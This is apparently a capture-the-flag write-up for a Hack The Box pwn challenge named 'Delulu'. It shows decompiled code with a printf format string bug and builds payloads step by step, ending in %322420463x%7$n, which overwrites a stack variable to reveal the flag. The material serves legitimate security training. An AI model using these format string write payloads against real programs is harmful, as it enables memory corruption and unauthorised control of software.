Delulu [pwn]

Recognition protocol initiated. Please present your face for scanning.

Pwn - 300 points

Walkthrough

We start by downloading the source files.

1MB

pwn_delulu.zip

archive

We are given a binary

delulu. Opening it with ghidra we can find a few interesting lines:

  long local_48;
  long *local_40;
  undefined8 user_input;
  ...
  read(0,&user_input,0x1f);
  printf("\n[!] Checking.. ");
  printf((char *)&user_input);
  if (local_48 == 0x1337beef) {
    delulu();
  }

The function

delulu prints the flag, so we need to set local_48 to 0x1337beef. Unfortunately we can't directly set this value, but looking at this code we find a printf statement that prints the user input. This is a format string vulnerability, so we can use this to write the value 0x1337beef to the address of local_48.

You can find more information about format string exploits here.

Let's build our payload step by step:

AAAAAAAA%8$p

This returns our 8th argument in the stack, which is our 8 A's. (We can use

gdb to make debugging easier.)

AAAAAAAA%7$n

This writes 8 to the 7th argument in the stack, which is

local_48.

We need to write 0x1337beef, so we need to write 0x1337beef characters before the %7$n. This is 322420463 characters in decimal.

We can do this with the folowing payload:

%322420463x%7$n

Connecting to the server and providing this input gives us the flag after 'some' time:

1c157380
You managed to deceive the robot, here's your new identity: HTB{m45t3r_0f_d3c3pt10n}